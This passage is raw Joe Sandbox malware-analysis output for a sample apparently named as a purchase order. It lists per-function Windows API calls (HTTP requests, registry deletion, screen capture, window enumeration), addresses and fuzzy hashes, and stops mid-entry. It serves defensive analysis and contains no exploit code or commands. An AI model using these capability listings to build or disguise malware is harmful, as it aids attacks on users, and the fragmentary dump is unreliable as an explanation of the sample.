                                • TrackPopupMenuEx.USER32(00221990,00000000,?,00000000,00000000,00000000), ref: 0019309D
                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001930A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                • String ID: 0
                                • API String ID: 36266755-4108050209
                                • Opcode ID: 85a7c4504ba4286bb48374c7a11d557fe90473f3c288edde4ec3cf77dc7a1434
                                • Instruction ID: f82545977a383ce4f6b3b62799d1f15469a782a4ed6e4240c5ea91909b126c7f
                                • Opcode Fuzzy Hash: 85a7c4504ba4286bb48374c7a11d557fe90473f3c288edde4ec3cf77dc7a1434
                                • Instruction Fuzzy Hash: 65710470644205BEEF258F64CC89FAABF64FF05364F244216F939AA1E0C7B1A954DB90
                                APIs
                                • DestroyWindow.USER32(?,?), ref: 001E6DEB
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001E6E5F
                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001E6E81
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001E6E94
                                • DestroyWindow.USER32(?), ref: 001E6EB5
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00150000,00000000), ref: 001E6EE4
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001E6EFD
                                • GetDesktopWindow.USER32 ref: 001E6F16
                                • GetWindowRect.USER32(00000000), ref: 001E6F1D
                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001E6F35
                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001E6F4D
                                  • Part of subcall function 00169944: GetWindowLongW.USER32(?,000000EB), ref: 00169952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                • String ID: 0$tooltips_class32
                                • API String ID: 2429346358-3619404913
                                • Opcode ID: c1d002fefd6d54685eceda1c8ab1198487b4ae895c87943848e72e03d428e9cb
                                • Instruction ID: eb917520e619384ba7993f3df8a2800c38f0cdcf99eaf7480dad1bf9fb1fb6d5
                                • Opcode Fuzzy Hash: c1d002fefd6d54685eceda1c8ab1198487b4ae895c87943848e72e03d428e9cb
                                • Instruction Fuzzy Hash: 2B718870104684AFDB20CF59DC98EAABBE9FBA9340F84041DF999872A1C770AD46CB51
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001CC4B0
                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001CC4C3
                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001CC4D7
                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001CC4F0
                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001CC533
                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001CC549
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001CC554
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001CC584
                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001CC5DC
                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001CC5F0
                                • InternetCloseHandle.WININET(00000000), ref: 001CC5FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                • String ID:
                                • API String ID: 3800310941-3916222277
                                • Opcode ID: d0f0f76b83423dd72d93ddf2fa1c3bedb57acacc4740357d7e79515415217e37
                                • Instruction ID: 57bc27fd7e66794e956fa27ecd59b972446767756cdc8f9238d22c7ca00916d9
                                • Opcode Fuzzy Hash: d0f0f76b83423dd72d93ddf2fa1c3bedb57acacc4740357d7e79515415217e37
                                • Instruction Fuzzy Hash: 1E515CB1600245BFDB218FA4CD88FAB7BBCFB28744F00841DF94996650DB30ED459BA1
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 001E8592
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85A2
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85AD
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85BA
                                • GlobalLock.KERNEL32(00000000), ref: 001E85C8
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85D7
                                • GlobalUnlock.KERNEL32(00000000), ref: 001E85E0
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85E7
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001E85F8
                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,001EFC38,?), ref: 001E8611
                                • GlobalFree.KERNEL32(00000000), ref: 001E8621
                                • GetObjectW.GDI32(?,00000018,?), ref: 001E8641
                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001E8671
                                • DeleteObject.GDI32(?), ref: 001E8699
                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001E86AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                • String ID:
                                • API String ID: 3840717409-0
                                • Opcode ID: 6e4242230b918421bf117b330e8e8bdfea36f6de314ddba5b61a4f423f712ffc
                                • Instruction ID: 531392b2a654cf94237b56636f7f2ef4b03352c59a4201793c89ade2b9574e06
                                • Opcode Fuzzy Hash: 6e4242230b918421bf117b330e8e8bdfea36f6de314ddba5b61a4f423f712ffc
                                • Instruction Fuzzy Hash: 18411975600285AFDB11DFA5CC88EAEBBB8FF89715F104158F919EB260DB309942DB60
                                APIs
                                • VariantInit.OLEAUT32(00000000), ref: 001C1502
                                • VariantCopy.OLEAUT32(?,?), ref: 001C150B
                                • VariantClear.OLEAUT32(?), ref: 001C1517
                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001C15FB
                                • VarR8FromDec.OLEAUT32(?,?), ref: 001C1657
                                • VariantInit.OLEAUT32(?), ref: 001C1708
                                • SysFreeString.OLEAUT32(?), ref: 001C178C
                                • VariantClear.OLEAUT32(?), ref: 001C17D8
                                • VariantClear.OLEAUT32(?), ref: 001C17E7
                                • VariantInit.OLEAUT32(00000000), ref: 001C1823
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                • API String ID: 1234038744-3931177956
                                • Opcode ID: 2c0b8891b99fd733365ce09d870efd67d1141528356a77044438b7c48db292ef
                                • Instruction ID: b0af2e6ba45a7b19a998427d4a83240d02c3140056abde2e82de3e0814636c8b
                                • Opcode Fuzzy Hash: 2c0b8891b99fd733365ce09d870efd67d1141528356a77044438b7c48db292ef
                                • Instruction Fuzzy Hash: F1D12232A40210EBCB049F64E885F7DB7B1BF67B00F51809EE806AB182DB30EC55DB91
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001DB6AE,?,?), ref: 001DC9B5
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DC9F1
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA68
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA9E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DB6F4
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001DB772
                                • RegDeleteValueW.ADVAPI32(?,?), ref: 001DB80A
                                • RegCloseKey.ADVAPI32(?), ref: 001DB87E
                                • RegCloseKey.ADVAPI32(?), ref: 001DB89C
                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 001DB8F2
                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001DB904
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 001DB922
                                • FreeLibrary.KERNEL32(00000000), ref: 001DB983
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DB994
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 146587525-4033151799
                                • Opcode ID: 0f4a728cbc8a2ee426d097ce7c55b1c0d4b2bdd07961685afdbea9c89a2d4df1
                                • Instruction ID: 41cdf8b803d9a026a25f816a7d21db6a6efdbdd8aff31dec16152f68b0cbb75a
                                • Opcode Fuzzy Hash: 0f4a728cbc8a2ee426d097ce7c55b1c0d4b2bdd07961685afdbea9c89a2d4df1
                                • Instruction Fuzzy Hash: 67C17A34208241EFD714DF24C8D5B2ABBE1BF84318F55855DF8AA4B3A2CB75E846CB91
                                APIs
                                • GetDC.USER32(00000000), ref: 001D25D8
                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001D25E8
                                • CreateCompatibleDC.GDI32(?), ref: 001D25F4
                                • SelectObject.GDI32(00000000,?), ref: 001D2601
                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001D266D
                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001D26AC
                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001D26D0
                                • SelectObject.GDI32(?,?), ref: 001D26D8
                                • DeleteObject.GDI32(?), ref: 001D26E1
                                • DeleteDC.GDI32(?), ref: 001D26E8
                                • ReleaseDC.USER32(00000000,?), ref: 001D26F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                • String ID: (
                                • API String ID: 2598888154-3887548279
                                • Opcode ID: 5eb8b3b9281977fc675cc1aa61cef812c3286625f347da659e6a7b24c947594e
                                • Instruction ID: 32366ef68d2cb7e2b455021d5073a523e199db7b50ffaf7f8f4b15dac6d7b865
                                • Opcode Fuzzy Hash: 5eb8b3b9281977fc675cc1aa61cef812c3286625f347da659e6a7b24c947594e
                                • Instruction Fuzzy Hash: 8F61C1B5D00219EFCB14CFA8DC84AAEBBB6FF58310F20852AE955A7350D774A951CF90
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0018DAA1
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D659
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D66B
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D67D
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D68F
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6A1
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6B3
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6C5
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6D7
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6E9
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D6FB
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D70D
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D71F
                                  • Part of subcall function 0018D63C: _free.LIBCMT ref: 0018D731
                                • _free.LIBCMT ref: 0018DA96
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018DAB8
                                • _free.LIBCMT ref: 0018DACD
                                • _free.LIBCMT ref: 0018DAD8
                                • _free.LIBCMT ref: 0018DAFA
                                • _free.LIBCMT ref: 0018DB0D
                                • _free.LIBCMT ref: 0018DB1B
                                • _free.LIBCMT ref: 0018DB26
                                • _free.LIBCMT ref: 0018DB5E
                                • _free.LIBCMT ref: 0018DB65
                                • _free.LIBCMT ref: 0018DB82
                                • _free.LIBCMT ref: 0018DB9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: cbc8953d7d4b8dcb9b4ee82a4b2ca2b9f702201be4733a06482567f12a8bd0b8
                                • Instruction ID: 4a91c1c0325c8934cdcf5674f1353731a7c9c8fa52d13f36c735cf8abada8a20
                                • Opcode Fuzzy Hash: cbc8953d7d4b8dcb9b4ee82a4b2ca2b9f702201be4733a06482567f12a8bd0b8
                                • Instruction Fuzzy Hash: F4313731A443059FEB26BA39F845B5AB7E9FF21324F264429E449D7191DF35AE808F20
                                APIs
                                • GetClassNameW.USER32(?,?,00000100), ref: 001B369C
                                • _wcslen.LIBCMT ref: 001B36A7
                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001B3797
                                • GetClassNameW.USER32(?,?,00000400), ref: 001B380C
                                • GetDlgCtrlID.USER32(?), ref: 001B385D
                                • GetWindowRect.USER32(?,?), ref: 001B3882
                                • GetParent.USER32(?), ref: 001B38A0
                                • ScreenToClient.USER32(00000000), ref: 001B38A7
                                • GetClassNameW.USER32(?,?,00000100), ref: 001B3921
                                • GetWindowTextW.USER32(?,?,00000400), ref: 001B395D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                • String ID: %s%u
                                • API String ID: 4010501982-679674701
                                • Opcode ID: c787450e7e13e4d5d7a767ccadc07dc49ecf575722502a244da1af47334fcc6c
                                • Instruction ID: 562c0c7536aecb1dcd698c691e8e14177ee4be895276a20283c89927e1c7e8fe
                                • Opcode Fuzzy Hash: c787450e7e13e4d5d7a767ccadc07dc49ecf575722502a244da1af47334fcc6c
                                • Instruction Fuzzy Hash: 2891D571204706EFD718DF64C885BEAF7A9FF44304F008619F9A9C6190DB30EA66CB91
                                APIs
                                • GetClassNameW.USER32(?,?,00000400), ref: 001B4994
                                • GetWindowTextW.USER32(?,?,00000400), ref: 001B49DA
                                • _wcslen.LIBCMT ref: 001B49EB
                                • CharUpperBuffW.USER32(?,00000000), ref: 001B49F7
                                • _wcsstr.LIBVCRUNTIME ref: 001B4A2C
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 001B4A64
                                • GetWindowTextW.USER32(?,?,00000400), ref: 001B4A9D
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 001B4AE6
                                • GetClassNameW.USER32(?,?,00000400), ref: 001B4B20
                                • GetWindowRect.USER32(?,?), ref: 001B4B8B
                                Similarity
                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                • String ID: ThumbnailClass
                                • API String ID: 1311036022-1241985126
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001E8D5A
                                • GetFocus.USER32 ref: 001E8D6A
                                • GetDlgCtrlID.USER32(00000000), ref: 001E8D75
                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 001E8E1D
                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001E8ECF
                                • GetMenuItemCount.USER32(?), ref: 001E8EEC
                                • GetMenuItemID.USER32(?,00000000), ref: 001E8EFC
                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001E8F2E
                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001E8F70
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001E8FA1
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                • String ID: 0
                                • API String ID: 1026556194-4108050209
                                APIs
                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001BDC20
                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001BDC46
                                • _wcslen.LIBCMT ref: 001BDC50
                                • _wcsstr.LIBVCRUNTIME ref: 001BDCA0
                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001BDCBC
                                Similarity
                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                • API String ID: 1939486746-1459072770
                                APIs
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001DCC64
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001DCC8D
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001DCD48
                                  • Part of subcall function 001DCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001DCCAA
                                  • Part of subcall function 001DCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001DCCBD
                                  • Part of subcall function 001DCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001DCCCF
                                  • Part of subcall function 001DCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001DCD05
                                  • Part of subcall function 001DCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001DCD28
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 001DCCF3
                                Similarity
                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 2734957052-4033151799
                                APIs
                                • timeGetTime.WINMM ref: 001BE6B4
                                  • Part of subcall function 0016E551: timeGetTime.WINMM(?,?,001BE6D4), ref: 0016E555
                                • Sleep.KERNEL32(0000000A), ref: 001BE6E1
                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 001BE705
                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001BE727
                                • SetActiveWindow.USER32 ref: 001BE746
                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001BE754
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 001BE773
                                • Sleep.KERNEL32(000000FA), ref: 001BE77E
                                • IsWindow.USER32 ref: 001BE78A
                                • EndDialog.USER32(00000000), ref: 001BE79B
                                Similarity
                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                • String ID: BUTTON
                                • API String ID: 1194449130-3405671355
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001BEA5D
                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001BEA73
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BEA84
                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001BEA96
                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001BEAA7
                                Similarity
                                • API ID: SendString$_wcslen
                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                • API String ID: 2420728520-1007645807
                                APIs
                                  • Part of subcall function 00168F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00168BE8,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 00168FC5
                                • DestroyWindow.USER32(?), ref: 00168C81
                                • KillTimer.USER32(00000000,?,?,?,?,00168BBA,00000000,?), ref: 00168D1B
                                • DestroyAcceleratorTable.USER32(00000000), ref: 001A6973
                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 001A69A1
                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 001A69B8
                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00168BBA,00000000), ref: 001A69D4
                                • DeleteObject.GDI32(00000000), ref: 001A69E6
                                Similarity
                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                • String ID:
                                • API String ID: 641708696-0
                                APIs
                                  • Part of subcall function 00169944: GetWindowLongW.USER32(?,000000EB), ref: 00169952
                                • GetSysColor.USER32(0000000F), ref: 00169862
                                Similarity
                                • API ID: ColorLongWindow
                                • String ID:
                                • API String ID: 259745315-0
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0019F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 001B9717
                                • LoadStringW.USER32(00000000,?,0019F7F8,00000001), ref: 001B9720
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0019F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 001B9742
                                • LoadStringW.USER32(00000000,?,0019F7F8,00000001), ref: 001B9745
                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 001B9866
                                Similarity
                                • API ID: HandleLoadModuleString$Message_wcslen
                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                • API String ID: 747408836-2268648507
                                APIs
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001B07A2
                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001B07BE
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001B07DA
                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001B0804
                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 001B082C
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001B0837
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001B083C
                                Similarity
